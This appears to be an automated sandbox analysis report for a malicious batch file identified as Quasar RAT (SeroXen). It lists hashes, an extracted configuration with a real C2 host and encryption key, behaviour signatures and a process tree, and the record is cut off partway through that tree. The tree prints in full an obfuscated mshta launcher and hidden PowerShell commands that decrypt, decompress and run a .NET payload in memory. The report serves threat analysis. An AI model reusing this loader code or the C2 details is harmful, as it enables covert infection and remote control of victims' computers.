Analysis

  • max time kernel
    300s
  • max time network
    297s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-06-2024 15:43

General

  • Target

    DarkMoon_Gen_1-3/lib/uni.bat

  • Size

    12.6MB

  • MD5

    8e3d8ed6db7cb979d5d56c8b847cc965

  • SHA1

    5d1ad752a988ce13da601448cdca5584610cffee

  • SHA256

    9d0b440b61b239bc3406d67bf7ae8baf1ceef65923e8558ce3a3c1a3c4a5e22a

  • SHA512

    d7a96420b1e61c4bc7db6c533704771e329239629201dbf34ac8a95a931da92c6e1d7ddb694a491656246b0eb491e96d194b7abccf54ef757c1aea92a9b96a0e

  • SSDEEP

    49152:Hq8mcjsXbvlusR48pNIN/I/EiFTPbYWLP17DFNkKuri3NSbkpXYyr7arOR150kFB:o

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v2.2.6 | SeroXen

C2

seroooooxeen.chickenkiller.com:5059

Mutex

f953c0af-702a-46b5-ad07-d900b11c5cd9

Attributes
  • encryption_key

    458790DC6E62EEB3043B4566BF95CDAF711F1EC0

  • install_name

    .exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Drops file in System32 directory 15 IoCs
  • Suspicious use of SetThreadContext 18 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Checks processor information in registry 2 TTPs 16 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:632
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:332
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{d024f0ae-4581-4a8f-ba3d-01261c76a7ab}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3644
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{4ca4d0bb-b434-4a1d-8079-8c6d2f99fa98}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3144
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{b952ffa4-3205-470b-9877-36a8bf22ed9d}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2432
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{2b6c7f4a-3ac5-4219-be93-c2ae64d67eac}
          2⤵
            PID:3000
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{ac0e883c-c141-42fe-beb8-49d00631b85d}
            2⤵
              PID:5608
            • C:\Windows\System32\dllhost.exe
              C:\Windows\System32\dllhost.exe /Processid:{8824b49e-55ad-4b47-8795-5656d37b7fbe}
              2⤵
                PID:1136
              • C:\Windows\System32\dllhost.exe
                C:\Windows\System32\dllhost.exe /Processid:{9f237546-d659-4a60-ab6a-6ad9e52e3e93}
                2⤵
                  PID:5052
                • C:\Windows\System32\dllhost.exe
                  C:\Windows\System32\dllhost.exe /Processid:{63d05880-a351-4d1c-ac0e-47e0bb6eb986}
                  2⤵
                    PID:5268
                  • C:\Windows\System32\dllhost.exe
                    C:\Windows\System32\dllhost.exe /Processid:{dcc15e1d-13f2-4a4b-b5f6-543cc16b8b75}
                    2⤵
                      PID:5688
                  • C:\Windows\system32\lsass.exe
                    C:\Windows\system32\lsass.exe
                    1⤵
                      PID:688
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                      1⤵
                        PID:960
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                        1⤵
                          PID:628
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                          1⤵
                            PID:1048
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                            1⤵
                              PID:1108
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                              1⤵
                                PID:1128
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                1⤵
                                • Drops file in System32 directory
                                PID:1192
                                • C:\Windows\system32\taskhostw.exe
                                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                  2⤵
                                    PID:2856
                                  • C:\Windows\$sxr-mshta.exe
                                    C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-fIvAWqRzQvWuAstOtyuG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                                    2⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Modifies registry class
                                    • Suspicious use of WriteProcessMemory
                                    PID:3148
                                    • C:\Windows\$sxr-cmd.exe
                                      "C:\Windows\$sxr-cmd.exe" /c %$sxr-fIvAWqRzQvWuAstOtyuG4312:&#<?=%
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:4048
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        4⤵
                                          PID:3440
                                        • C:\Windows\$sxr-powershell.exe
                                          C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function cZwGr($wJEcK){ $AFKcp=[System.Security.Cryptography.Aes]::Create(); $AFKcp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $AFKcp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $AFKcp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw='); $AFKcp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A=='); $Czfqh=$AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')(); $jNjPg=$Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJEcK, 0, $wJEcK.Length); $Czfqh.Dispose(); $AFKcp.Dispose(); $jNjPg;}function nyZgh($wJEcK){ $zAUTt=New-Object System.IO.MemoryStream(,$wJEcK); $GiIcD=New-Object System.IO.MemoryStream; $IbKVT=New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::Decompress); $IbKVT.CopyTo($GiIcD); $IbKVT.Dispose(); $zAUTt.Dispose(); $GiIcD.Dispose(); $GiIcD.ToArray();}function JitsM($wJEcK,$KvmVX){ $hfTYl=[System.Reflection.Assembly]::Load([byte[]]$wJEcK); $vpjLB=$hfTYl.EntryPoint; $vpjLB.Invoke($null, $KvmVX);}$AFKcp1 = New-Object System.Security.Cryptography.AesManaged;$AFKcp1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$MfWDX = $AFKcp1.('rotpyrceDetaerC'[-1..-15] -join '')();$OXRcs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Ud8pMApbv/gxu+JXtMI7A==');$OXRcs = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs, 0, $OXRcs.Length);$OXRcs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs);$MJSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VJkIni/eEgLNMCmmbuF+9uJHd2ZxHH9BvEMmnfuAs4=');$MJSJO = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MJSJO, 0, $MJSJO.Length);$MJSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MJSJO);$eldAL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MUqFa/ybH7fq9E8cDwzQqA==');$eldAL = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eldAL, 0, $eldAL.Length);$eldAL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eldAL);$JmtWK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNiqtzRUbqzid5tIIG0tdSQQSCND4N3Fip71HpyVpNu/LbAnkQDXvXCNN67DnhoH5Y27G2MJlveDAN7CWQjo2dJc4tmKQnvASHPTcy0RyGxkDhbwoL6OdXRgiYeimaZ3i49J/rxWBNL33jIrXjV6wccc/4aVjVPEYt/lsF5IHcTecs+F97GmTz/xlfrGHuS+klKIHdbsKNtk359gBlEuyIzqc8ZNoXjIsDYcHPmRQW0ppscjiU1/jln8klv2aIxKfUrd3GQUbnHsQMaMF/hqOHe+EY+XH4G0NlTI/p6Gfj6oZBnjn21FQDxykIFEupy9SA9V6u+rIOYPN2aHFGH15vJWjy68WQLa9uRRD0iNI3+fN5lBaMhngNS166V7oDsfk6HFYYqd4SbkPV+So/C260QI7aUZVElJYwH9zWeJN68=');$JmtWK = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JmtWK, 0, $JmtWK.Length);$JmtWK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JmtWK);$sutWG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('721Pgwb2TpdFalOhddbR8A==');$sutWG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sutWG, 0, $sutWG.Length);$sutWG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sutWG);$RmeiH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sYsCTgz2k9CJtXOv5QOESQ==');$RmeiH = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmeiH, 0, $RmeiH.Length);$RmeiH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RmeiH);$yKibX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5yBJCVjGNNI8c4y5TeJZ1g==');$yKibX = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yKibX, 0, $yKibX.Length);$yKibX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yKibX);$mWhwt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HFsj1rvOoFy/1AQ35wf56A==');$mWhwt = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mWhwt, 0, $mWhwt.Length);$mWhwt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mWhwt);$MQVoG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8OL2bqVmk+GN3goxj/uiw==');$MQVoG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MQVoG, 0, $MQVoG.Length);$MQVoG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MQVoG);$OXRcs0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spJ+lRLXqmjOi3nI0UTS5g==');$OXRcs0 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs0, 0, $OXRcs0.Length);$OXRcs0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs0);$OXRcs1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U4iTk4zuVeeTIShJARv6Pg==');$OXRcs1 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs1, 0, $OXRcs1.Length);$OXRcs1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs1);$OXRcs2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9xaq7OLHlKH+W6faIqwAMw==');$OXRcs2 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs2, 0, $OXRcs2.Length);$OXRcs2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs2);$OXRcs3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JOLtcnTz9Wy99GrNQ2MuMQ==');$OXRcs3 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs3, 0, $OXRcs3.Length);$OXRcs3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs3);$MfWDX.Dispose();$AFKcp1.Dispose();if (@(get-process -ea silentlycontinue $OXRcs3).count -gt 1) {exit};$lJYQx = [Microsoft.Win32.Registry]::$mWhwt.$yKibX($OXRcs).$RmeiH($MJSJO);$mFwmU=[string[]]$lJYQx.Split('\');$xwjch=nyZgh(cZwGr([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[1])));JitsM $xwjch (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Alykr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[0]);$AFKcp = New-Object System.Security.Cryptography.AesManaged;$AFKcp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$Czfqh = $AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')();$Alykr = $Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Alykr, 0, $Alykr.Length);$Czfqh.Dispose();$AFKcp.Dispose();$zAUTt = New-Object System.IO.MemoryStream(, $Alykr);$GiIcD = New-Object System.IO.MemoryStream;$IbKVT = New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::$OXRcs1);$IbKVT.$MQVoG($GiIcD);$IbKVT.Dispose();$zAUTt.Dispose();$GiIcD.Dispose();$Alykr = $GiIcD.ToArray();$hUYCw = $JmtWK | IEX;$hfTYl = $hUYCw::$OXRcs2($Alykr);$vpjLB = $hfTYl.EntryPoint;$vpjLB.$OXRcs0($null, (, [string[]] ($eldAL)))
                                          4⤵
                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of SetWindowsHookEx
                                          • Suspicious use of WriteProcessMemory
                                          PID:3740
                                          • C:\Windows\SysWOW64\dllhost.exe
                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{46032ab0-cdab-4186-87fc-1989cf8fe3c9}
                                            5⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1136
                                          • C:\Windows\$sxr-powershell.exe
                                            "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3740).WaitForExit();[System.Threading.Thread]::Sleep(5000); function cZwGr($wJEcK){ $AFKcp=[System.Security.Cryptography.Aes]::Create(); $AFKcp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $AFKcp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $AFKcp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw='); $AFKcp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A=='); $Czfqh=$AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')(); $jNjPg=$Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJEcK, 0, $wJEcK.Length); $Czfqh.Dispose(); $AFKcp.Dispose(); $jNjPg;}function nyZgh($wJEcK){ $zAUTt=New-Object System.IO.MemoryStream(,$wJEcK); $GiIcD=New-Object System.IO.MemoryStream; $IbKVT=New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::Decompress); $IbKVT.CopyTo($GiIcD); $IbKVT.Dispose(); $zAUTt.Dispose(); $GiIcD.Dispose(); $GiIcD.ToArray();}function JitsM($wJEcK,$KvmVX){ $hfTYl=[System.Reflection.Assembly]::Load([byte[]]$wJEcK); $vpjLB=$hfTYl.EntryPoint; $vpjLB.Invoke($null, $KvmVX);}$AFKcp1 = New-Object System.Security.Cryptography.AesManaged;$AFKcp1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$MfWDX = $AFKcp1.('rotpyrceDetaerC'[-1..-15] -join '')();$OXRcs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Ud8pMApbv/gxu+JXtMI7A==');$OXRcs = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs, 0, $OXRcs.Length);$OXRcs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs);$MJSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VJkIni/eEgLNMCmmbuF+9uJHd2ZxHH9BvEMmnfuAs4=');$MJSJO = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MJSJO, 0, $MJSJO.Length);$MJSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MJSJO);$eldAL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MUqFa/ybH7fq9E8cDwzQqA==');$eldAL = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eldAL, 0, $eldAL.Length);$eldAL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eldAL);$JmtWK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNiqtzRUbqzid5tIIG0tdSQQSCND4N3Fip71HpyVpNu/LbAnkQDXvXCNN67DnhoH5Y27G2MJlveDAN7CWQjo2dJc4tmKQnvASHPTcy0RyGxkDhbwoL6OdXRgiYeimaZ3i49J/rxWBNL33jIrXjV6wccc/4aVjVPEYt/lsF5IHcTecs+F97GmTz/xlfrGHuS+klKIHdbsKNtk359gBlEuyIzqc8ZNoXjIsDYcHPmRQW0ppscjiU1/jln8klv2aIxKfUrd3GQUbnHsQMaMF/hqOHe+EY+XH4G0NlTI/p6Gfj6oZBnjn21FQDxykIFEupy9SA9V6u+rIOYPN2aHFGH15vJWjy68WQLa9uRRD0iNI3+fN5lBaMhngNS166V7oDsfk6HFYYqd4SbkPV+So/C260QI7aUZVElJYwH9zWeJN68=');$JmtWK = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JmtWK, 0, $JmtWK.Length);$JmtWK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JmtWK);$sutWG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('721Pgwb2TpdFalOhddbR8A==');$sutWG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sutWG, 0, $sutWG.Length);$sutWG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sutWG);$RmeiH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sYsCTgz2k9CJtXOv5QOESQ==');$RmeiH = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmeiH, 0, $RmeiH.Length);$RmeiH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RmeiH);$yKibX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5yBJCVjGNNI8c4y5TeJZ1g==');$yKibX = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yKibX, 0, $yKibX.Length);$yKibX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yKibX);$mWhwt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HFsj1rvOoFy/1AQ35wf56A==');$mWhwt = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mWhwt, 0, $mWhwt.Length);$mWhwt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mWhwt);$MQVoG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8OL2bqVmk+GN3goxj/uiw==');$MQVoG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MQVoG, 0, $MQVoG.Length);$MQVoG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MQVoG);$OXRcs0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spJ+lRLXqmjOi3nI0UTS5g==');$OXRcs0 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs0, 0, $OXRcs0.Length);$OXRcs0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs0);$OXRcs1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U4iTk4zuVeeTIShJARv6Pg==');$OXRcs1 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs1, 0, $OXRcs1.Length);$OXRcs1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs1);$OXRcs2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9xaq7OLHlKH+W6faIqwAMw==');$OXRcs2 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs2, 0, $OXRcs2.Length);$OXRcs2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs2);$OXRcs3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JOLtcnTz9Wy99GrNQ2MuMQ==');$OXRcs3 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs3, 0, $OXRcs3.Length);$OXRcs3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs3);$MfWDX.Dispose();$AFKcp1.Dispose();if (@(get-process -ea silentlycontinue $OXRcs3).count -gt 1) {exit};$lJYQx = [Microsoft.Win32.Registry]::$mWhwt.$yKibX($OXRcs).$RmeiH($MJSJO);$mFwmU=[string[]]$lJYQx.Split('\');$xwjch=nyZgh(cZwGr([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[1])));JitsM $xwjch (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Alykr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[0]);$AFKcp = New-Object System.Security.Cryptography.AesManaged;$AFKcp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$Czfqh = $AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')();$Alykr = $Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Alykr, 0, $Alykr.Length);$Czfqh.Dispose();$AFKcp.Dispose();$zAUTt = New-Object System.IO.MemoryStream(, $Alykr);$GiIcD = New-Object System.IO.MemoryStream;$IbKVT = New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::$OXRcs1);$IbKVT.$MQVoG($GiIcD);$IbKVT.Dispose();$zAUTt.Dispose();$GiIcD.Dispose();$Alykr = $GiIcD.ToArray();$hUYCw = $JmtWK | IEX;$hfTYl = $hUYCw::$OXRcs2($Alykr);$vpjLB = $hfTYl.EntryPoint;$vpjLB.$OXRcs0($null, (, [string[]] ($eldAL)))
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4320
                                          • C:\Windows\SysWOW64\dllhost.exe
                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{fd169554-4a0c-40bc-bd23-fe13ce69d63d}
                                            5⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5064
                                          • C:\Windows\SysWOW64\dllhost.exe
                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{681a2f16-3a74-4f3a-9f9c-3e8291603a7e}
                                            5⤵
                                              PID:5612
                                            • C:\Windows\SysWOW64\dllhost.exe
                                              C:\Windows\SysWOW64\dllhost.exe /Processid:{d8876bc4-b3b7-48f3-a092-8bfd726d58cb}
                                              5⤵
                                                PID:496
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 448
                                                  6⤵
                                                  • Drops file in Windows directory
                                                  • Program crash
                                                  • Checks processor information in registry
                                                  • Enumerates system info in registry
                                                  PID:848
                                              • C:\Windows\SysWOW64\dllhost.exe
                                                C:\Windows\SysWOW64\dllhost.exe /Processid:{eb24684e-6e7e-494f-b0cb-760c630df1ad}
                                                5⤵
                                                  PID:4804
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4804 -s 460
                                                    6⤵
                                                    • Program crash
                                                    • Checks processor information in registry
                                                    • Enumerates system info in registry
                                                    PID:5968
                                                • C:\Windows\SysWOW64\dllhost.exe
                                                  C:\Windows\SysWOW64\dllhost.exe /Processid:{b7aabb36-2036-4d86-9fcf-dc6d187a9ebb}
